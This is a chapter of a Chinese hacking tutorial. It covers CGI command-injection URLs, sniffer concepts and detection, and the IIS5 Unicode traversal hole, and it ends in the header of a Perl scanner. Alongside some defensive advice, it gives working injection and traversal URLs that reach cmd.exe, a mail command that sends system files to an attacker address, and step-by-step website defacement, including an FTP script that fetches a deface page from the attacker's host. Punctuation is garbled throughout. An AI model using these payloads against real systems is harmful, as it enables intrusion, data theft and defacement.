30天打造专业红客-第9章
按键盘上方向键 ← 或 → 可快速上下翻页,按键盘上的 Enter 键可回到本书目录页,按键盘上方向键 ↑ 可回到本页顶部!
————未阅读完?加入书签已便下次继续阅读!
的权限
Examples: host/cgi…bin/bad。cgi?doh=。。/。。/。。/。。/bin/ps%20…aux| host/cgi…bin/bad。cgi?doh=ps%20…aux;
'kill and killall' 命令
在unix系统这个命令用于杀掉进程,一个攻击者可以用这个命令来停止系统服务和程序,同时可以擦掉攻击者的痕迹,一些exploit会产生很多的子进程
Examples: host/cgi…bin/bad。cgi?doh=。。/bin/kill%20…9%200| host/cgi…bin/bad。cgi?doh=kill%20…9%200;
'uname' 命令
这个命令告诉攻击者远程机器的名字,一些时候,通过这个命令知道web站点位于哪个isp,也许是攻击者曾今访问过的。通常uname …a来请求,这些都将记录在日志文件中
Examples: host/cgi…bin/bad。cgi?doh=。。/。。/。。/。。/bin/uname%20…a| host/cgi…bin/bad。cgi?doh=uname%20…a;
'cc; gcc; perl; python; etc。。。' 编译/解释命令
攻击者通过wget或者tftp下载exploit,并用cc;gcc这样的编译程序进行编译成可执行程序,进一步获得特权
Examples: host/cgi…bin/bad。cgi?doh=。。/。。/。。/。。/bin/cc%20Phantasmp。c| host/cgi…bin/bad。cgi?doh=gcc%20Phantasmp。c;。/a。out%20…p%2031337;
如果你查看日志中发现有“perl” python”这些说明可能攻击者下载远程的perl ;python脚本程序,并试图本地获得特权
'mail' 命令
攻击者通常用这个命令将系统的一些重要文件发到攻击者自己的信箱,也肯能是进行邮件炸弹的攻击
Examples: host/cgi…bin/bad。cgi?doh=。。/。。/。。/。。/bin/mail%20attacker@****cnhonker%20《
『第14天』sniffer,今天开始说它了
sniffers(嗅探器)几乎和internet有一样久的历史了。他们是最早的一个允许系统管理员分析网络和查明哪里有错误发生的工具。但是这个工具也给我们带来很大的方便。今天我们看2个问题:1。什么是sniffer 2。如何防止sniffer的监听。似乎是矛盾的哦,呵呵,要2个方面都知道才能百战百胜嘛
什嘛是sniffer (抄定义的)
在单选性网络中; 以太网结构广播至网路上所有的机器; 但是只有预定接受信息包的那台计算机才会响应。 不过网路上其他的计算机同样会〃看到〃这个信息包;但是如果他们不是预定的接受者;他们会排除这个信息包。 当一台计算机上运行着sniffer的时候并且网络处于监听所有信息交通的状态; 那么这台计算机就有能力浏览所有的在网络上通过的信息包。(这个当然很爽了)
那你就有个问题谁使用这个呢?lan/wan 管理员使用sniffers来分析网络信息交通并且找出网络上何处发生问题。一个安全管理员可以同时用多种sniffers; 将它们放置在网络的各处;形成一个入侵警报系统。对于系统管理员来说sniffers是一个非常好的工具,当然还有我们大家了。那常见的sniffers 有哪些呢?很多,我常用的有Sniffer Pro。当然看一些文章介绍了snoop,但注意这是在UNIX下的,我没怎么用 过 ,所以就不说这个了。至于其他一些好用的,我想你学到现在了应该可以自己找了(上GOOGLE 或是BAIDU都可以,不然去yahoo也不错的)。
那怎么防止sniffer的监听?
显而易见的;保护网络不受sniffer监听的方法就是不要让它们进入。 如果一个人不能通过你的系统进入的话;那么他们无法安装sniffers。当有人看上一个大多数网络通讯流通的中心区域(防火墙或是代理服务器)时;他们便确定这是他们的攻击目标并将被监视。一些可能的〃受害者〃在服务器的旁边;这时候个人信息将被截获(可能是各种信息甚至是密码)
一个好的方式来保护你的网络不受sniffer监视是将网络用以太网接线器代替普通的集线器分成尽可能多的段。接线器可以分割你的网络通讯并防止每一个系统〃看到〃每个信息包。坏处是这种东西太贵了,这个还是很重要的
另一个方法是;和那种接线器比就是加密术。Sniffer依然可以监视到信息的传送;但是显示的是乱码。但这个有问题就是网络会延迟,当然还有速度问题和使用一个弱加密术比较容易被攻破。
用一些软件也可以帮助你查出是不是有人在监视你,比如AntiSniff(很小的,但可以扫描你的网路并测试一台计算机是否运行在混杂模式(监听网路上每个数据包)什么意思?你看看上面的类容吧),下载:pdasky/down。asp?id=2876&no=1
『第15天』网络监听技术分析 纯属理论
今天我们先说几个基本概念。首先,我们知道,一台接在以太网内的计算机为了和其他主机进行通讯,在硬件上是需要网卡,在软件上是需要网卡驱动程序的。而每块网卡在出厂时都有一个唯一的不与世界上任何一块网卡重复的硬件地址,称为mac地址。同时,当网络中两台主机在实现tcp/ip通讯时,网卡还必须绑定一个唯一的ip地址。
对我们来说,浏览网页,收发邮件等都是很平常,很简便的工作,其实在后台这些工作是依*tcp/ip协议族实现的,大家知道有两个主要的网络体系:OSI参考模型和TCP/IP参考模型,OSI模型即为通常说的7层协议,它由下向上分别为物理层、数据链路层、网络层、传输层、会话层、表示层、应用层,而tcp/ip模型中去掉了会话层和表示层后,由剩下的5层构成了互联网的基础,在网络的后台默默的工作着。
当局域网内(因为我们最常见的就是局域网)的主机都通过HUB等方式连接时,一般都称为共享式的连接(就是大家长说的共享),这种共享式的连接有一个很明显的特点:就是HUB会将接收到的所有数据向HUB上的每个端口转发,也就是说当主机根据mac地址进行数据包发送时,尽管发送端主机告知了目标主机的地址,但这并不意味着在一个网络内的其他主机听不到发送端和接收端之间的通讯,只是在正常状况下其他主机会忽略这些通讯报文而已!如果这些主机不愿意忽略这些报文,网卡被设置为promiscuous状态的话,那么,对于这台主机的网络接口而言,任何在这个局域网内传输的信息都是可以被听到的。如果网卡被设置为为混杂模式(promiscuous),主机将会默不作声的听到以太网内传输的所有信息,也就是说:窃听也就因此实现了!
对发生在局域网的其他主机上的监听,一直以来,都缺乏很好的检测方法。这是由于产生网络监听行为的主机在工作时总是不做声的收集数据包,几乎不会主动发出任何信息。但可惜的有些大虾们就爱动脑筋啊;现在已经有些方法了
1:反应时间
向怀疑有网络监听行为的网络发送大量垃圾数据包,根据各个主机回应的情况进行判断,正常的系统回应的时间应该没有太明显的变化,而处于混杂模式的系统由于对大量的垃圾信息照单全收,所以很有可能回应时间会发生较大的变化。这个方法很好;但有时候也没用因为大家没经验嘛
2:观测dns
许多的网络监听软件都会尝试进行地址反向解析,在怀疑有网络监听发生时可以在dns系统上观测有没有明显增多的解析请求。没DNS的或者不能接触的就有点郁闷了
3:利用ping模式进行监测
这个方法我不怎么知道;看了一些文章就COPY了一下;有点头晕;但应该能看懂:假设我们怀疑的主机的硬件地址是00:30:6E:00:9B:B9;它的ip地址是192。168。1。1;那么我们现在伪造出这样的一种icmp数据包:硬件地址是不与局域网内任何一台主机相同的00:30:6E:00:9B:9B;目的地址是192。168。1。1不变,我们可以设想一下这种数据包在局域网内传输会发生什么现象:任何正常的主机会检查这个数据包,比较数据包的硬件地址,和自己的不同,于是不会理会这个数据包,而处于网络监听模式的主机呢?由于它的网卡现在是在混杂模式的,所以它不会去对比这个数据包的硬件地址,而是将这个数据包直接传到上层,上层检查数据包的ip地址,符合自己的ip,于是会对对这个ping的包做出回应。这样,一台处于网络监听模式的主机就被发现了。
4:利用arp数据包进行监测
这个方法和上面的差不多;它使用arp数据包替代了上述的icmp数据包而已;向局域网内的主机发送非广播方式的arp包,如果局域网内的某个主机响应了这个arp请求,那 么我们就可以判断它很可能就是处于网络监听模式了,这是目前相对而言比较好的监测模式。
(什么叫ARP?就说ARP协议;它是Address Resolution Protocol”(地址解析协议)的缩写;在局域网中,网络中实际传输的是“帧”,帧里面是有目标主机的MAC地址的。所谓“地址解析”就是主机在发送帧前将目标IP地址转换成目标MAC地址的过程。ARP协议的基本功能就是通过目标设备的IP地址,查询目标设备的MAC地址,以保证通信的顺利进行。)
昨天有些朋友说找不到一些网络监听的工具;你在google搜sniffer tools有很多的。
我就列举一些了
Windows平台下的:
Windump xfocus/tools/200108/238。html
相关介绍:security。zz。ha/windump。html
注意这个是在NT下用的98就别用了,说到这想说一局如果你的系统是98或是ME的,最好换一个,因为好多很好的软件都要求是NT的
UNIX下:
Sniffitprogramsalon/download。asp?type_id=53 第6个
该软件的安装介绍:xfocus/articles/200001/28。html
'第16天'IIS5 UNICODE 编码漏洞
unicode 漏洞是最容易让入侵者得手的一个漏洞;可以不费吹灰之力将主页改掉;重则删除
硬盘上的数据;高手甚至获取administrator 权限!
漏洞自大前年年10 月份公布至今;居然国内还有这么多的服务器存在着该漏洞
下面我从一般的入侵手法分析如何做相应的防护对策。
(一)unicode 漏洞的原理
有关漏洞的原理网上已经有很多相关的文章了;我不打算详细说;还是简单的来了解了解
好了!
实际上就是UNICODE 编码存在BUG,在UNICODE 编码中
%c1%1c …〉(0xc1 … 0xc0) * 0x40 + 0x1c = 0x5c = '/'
%c0%2f …〉(0xc0 … 0xc0) * 0x40 + 0x2f = 0x2f = ''
在NT4 中/编码为%c1%9c 。在英文版里:WIN2000 英文版%c0%af
该漏洞是利用扩展UNICODE 字符取代〃/〃和〃”而能利用〃。。/〃目录遍历;故在一台有
unicode 漏洞的服务器ip 后边加上/scripts/。。%c1%1c。。/winnt/system32/cmd。exe?/c+dir+c:就可
以看到主机上c 盘的所有文件及目录。
(二)unicode 漏洞的危害
未经授权的用户可能利用IUSR_machinename 账号的上下文空间访问任何已知的文件。
该账号在默认情况下属于Everyone 和Users 组的成员,因此任何与Web 根目录在同一逻辑
驱动器上的能被这些用户组访问的文件都能被删除;修改或执行,就如同一个用户成功登陆
所能完成的一样。
以上部分内容摘自绿盟!
(三)unicode 漏洞的攻击手法
1、利用漏洞修改主页
这可能是新手们最兴奋的事情了!每当他们成功地黑掉一个网页后都有一股极大的满足
感。然而黑网页也是最简单的事情。
手段描述一:入侵者先用扫描工具扫到有漏洞的主机后;在IE 的地址栏里输入主机
的ip/scripts/。。%c1%9c。。/winnt/system32/cmd。exe?/c+dir+c:就可以看到主机上c 盘的所有文件
了。要查主页放在什么地方的话;可以将后边的dir+c:换成set ;从返回的错误信息中找到
PATH_TRANSLATED=c:inetpubwwwroot 这一句(具体的路径根据具体的情况而定)。其中的
c:inetpubwwwroot 就是主页所在的地方!接着入侵者为了避免系统对特殊字符的检测;故将
本地机器的CMD。EXE 程序复制到主机的c:inetpubscripts 目录中;这样干起活来就容易多了!
他们查到主页的名字后;就可以利用echo 命令来写入信息;将内容覆盖掉主页文件就把主页
给黑了。
手段描述二:除了上面的土方法外;入侵者可以将有声有色的黑页替换主页;这样黑得不是
更爽吗?来看看他们是如何做到的。
先在本地硬盘建立个共享文件夹(如gale);把黑页复制进去。照样把cmd。exe 拷贝到目标
的c:inetpubscripts 下;名字为gale。exe,映射本地的gale 目录为目标的一个盘(如q:)
把q:里的复制到目标主机的网页目录去。覆盖对方的网页文件,最后断开映射就可以了。
这是利用本地共享目录和映射硬盘的方法替换黑页;如果黑页有背景又有音乐;文件很大;上
传费事;怎么完美一点呢?请看下边。
手段描述三:这种方法也是红客们黑美国、日本的时候最常用的手法。
入侵者先申请一个免费空间,把做好的黑页上传上去,然后利用echo 命令在目标主机
上建立一个文本文件,写上几行命令,如下:
目标主机ip/scripts/gale。exe?/c+echo+open+你黑页所在的免费空间ip》文本文件名。txt
目标主机ip/gale。exe?/c+echo+你在黑页空间上的帐户》》文本文件名。txt
目标主机ip/gale。exe?/c+echo+密码》》文本文件名。txt
目标主机ip/gale。exe?/c+echo+get+index。htm》》文本文件名。txt
目标主机ip/gale。exe?/c+echo+bye》》文本文件名。txt
目标主机ip/gale。exe?/c+ftp+…s:文本文件名。txt
这样入侵者就可以将黑页从另外一个空间下载到目标主机上,copy 过去覆盖就可以了。
这样入侵者不受地方的限制,随便什么地方了,比如网吧。
(四)unicode 漏洞的防护措施
说了那么多,现在该转入正题了,下面我来说说防范的措施,这也是从攻击中总结出来
的一些措施,希望对大家有帮助。
1、打上最新补丁
作为一个网络管理员,为了服务器的安全,需要不停的打上最新补丁,这是比较有效的
方法。但你要记住:在网络上;没有绝对的安全的,道高一尺;魔高一丈;完全相信防火墙和系
统补丁往往是很愚蠢的。
2、冷酷到底,拒人于千里之外
相信到现在还利用unicode 漏洞入侵的人都是些新手傻瓜们!他们没有确定的入侵目标,
只是抓个扫描器来乱扫一通,扫到就黑,扫不到就哭的那种。对付扫描器扫出未知的漏洞,
这是管理员的聪明之处。如何躲过扫描器的眼睛呢?请先看看下面一个用perl 写的扫描器代
码吧:
#!/usr/bin/perl
#Root Shell Hackers
#piffy
#this is a quick scanner i threw together while supposedly doing homework in my room。
#it will go through a list of sites and check if it gives a directory listing for the new IIS hole
#it checks for both %c0%af and %c1%9c (其他版本的请修改这样的字符)
#perhaps a public script to do some evil stuff with this exploit later。。。 h0